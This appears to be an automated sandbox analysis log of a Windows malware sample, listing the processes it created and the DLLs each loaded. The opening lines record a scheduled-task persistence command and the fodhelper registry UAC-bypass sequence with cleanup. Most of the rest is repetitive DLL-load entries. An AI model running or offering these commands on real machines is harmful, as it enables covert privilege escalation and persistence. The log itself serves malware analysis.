                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2 /nobreakJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat"Jump to behavior
                      Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Install.exe" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2 /nobreak
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: mrmcorer.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.ui.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windowmanagementapi.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47mrm.dllJump to behavior
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dll
